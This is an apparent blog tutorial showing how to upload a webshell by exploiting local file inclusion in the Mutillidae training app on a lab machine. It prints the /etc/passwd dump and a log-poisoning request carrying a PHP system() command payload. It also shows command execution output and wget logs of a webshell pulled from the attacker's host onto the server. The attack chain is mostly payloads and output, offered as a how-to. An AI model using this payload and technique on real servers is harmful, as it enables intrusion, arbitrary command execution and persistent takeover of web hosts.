Today I will share you how to upload shell to web server with local file inclusion (LFI)..
first I was tried one web that vulner of LFI attack then I tried to inject the variable page like this
http://192.168.56.101/mutillidae/index.php?page=.../ and it got an error like this bellow
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /opt/lampp/htdocs/mutillidae/index.php on line 352
Warning: include() [function.include]: Failed opening '../' for inclusion (include_path='.:/opt/lampp/lib/php') in /opt/lampp/htdocs/mutillidae/index.php on line 352
its mean that this web can be exploit .. next job I have to find out location of directory etc/passwd/
oot:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh dhcp:x:100:101::/nonexistent:/bin/false syslog:x:101:102::/home/syslog:/bin/false klog:x:102:103::/home/klog:/bin/false messagebus:x:103:107::/var/run/dbus:/bin/false avahi:x:104:108:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false cupsys:x:105:109::/home/cupsys:/bin/false haldaemon:x:106:110:Hardware abstraction layer,,,:/var/run/hal:/bin/false hplip:x:107:7:HPLIP system user,,,:/var/run/hplip:/bin/false soikrucil:x:1000:1000:SOy,,,:/home/soikrucil:/bin/bash
the next I have to find out the directory of file error_log and access_log the i tried testing like this
and the results like this :
192.168.56.1 - - [09/Aug/2011:21:38:21 +0700] "GET /mutillidae/styles/global-styles.css HTTP/1.1" 304 - 192.168.56.1 - - [09/Aug/2011:21:38:22 +0700] "GET /mutillidae/styles/ddsmoothmenu/ddsmoothmenu.css HTTP/1.1" 304 - 192.168.56.1 - - [09/Aug/2011:21:38:22 +0700] "GET /mutillidae/javascript/ddsmoothmenu/jquery.min.js HTTP/1.1" 304 - 192.168.56.1 - - [09/Aug/2011:21:38:22 +0700] "GET /mutillidae/styles/ddsmoothmenu/ddsmoothmenu-v.css HTTP/1.1" 304 - 192.168.56.1 - - [09/Aug/2011:21:38:22 +0700] "GET /mutillidae/javascript/ddsmoothmenu/ddsmoothmenu.js
then I tried to testing for error_log
and the results like this :
[Tue Aug 09 21:39:25 2011] [error] [client 192.168.56.1] Invalid method in request \xff\xf4\xff\xfd\x06
those all the content of error_log access_log file
now I try to inject the file using bad request error that contain the simple script
I open the console then i try to telnet the target using port 80 and the result like this :
root@bt:~# telnet 192.168.56.101 80
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
GET /<? system ($_REQUEST['cmd']); ?> HTTP/0.1
HTTP/1.1 400 Bad Request
Date: Tue, 09 Aug 2011 13:45:19 GMT
Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.8 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Length: 399
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.8 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at localhost Port 80</address>
</body></html>
Connection closed by foreign host.
this request will be write down on error_log and access log file, its mean that I can access my script from the file using local file inclusion before.
if log successfully write on it, and i tried to access the directory of access_log again
and I got error like this :
Warning: system() [function.system]: Cannot execute a blank command in /opt/lampp/logs/access_log on line 32
HTTP/0.1 " 400 399
Its mean that the script successfully write..now try to execute command like id..
like this :
and the results of the command :
09/Aug/2011:21:46:20 +0700] "GET /uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) HTTP/0.1 " 400 399 192.168.56.1 - -
this time to upload my webshell wahahaha
and I am not really believe my webshell successfully uploaded..so I go to check the error_log and the results said successfully saved. the result like this :
92.168.56.1] request failed: error reading the headers wget: /opt/lampp/lib/libcrypto.so.0.9.8: no version information available (required by wget) wget: /opt/lampp/lib/libssl.so.0.9.8: no version information available (required by wget) --21:58:12-- http://192.168.56.1/shEll.txt => `/opt/lampp/htdocs/soi.php' Connecting to 192.168.56.1:80... connected. HTTP request sent, awaiting response... 200 OK Length: 2.800 (2.7K) [text/plain] 0K .. 100% 148.35 MB/s 21:58:12 (148.35 MB/s) - `/opt/lampp/htdocs/soi.php' saved [2800/2800] wget: /opt/lampp/lib/libcrypto.so.0.9.8: no version information available (required by wget) wget: /opt/lampp/lib/libssl.so.0.9.8: no version information available (required by wget) --21:58:17-- http://192.168.56.1/shEll.txt => `/opt/lampp/htdocs/soi.php' Connecting to 192.168.56.1:80... connected. HTTP request sent, awaiting response... 200 OK Length: 2.800 (2.7K) [text/plain] 0K .. 100% 140.54 MB/s 21:58:17 (140.54 MB/s) - `/opt/lampp/htdocs/soi.php' saved [2800/2800]
and I can access my webshell using url :
thanks ....by 5oy..
Tidak ada komentar:
Posting Komentar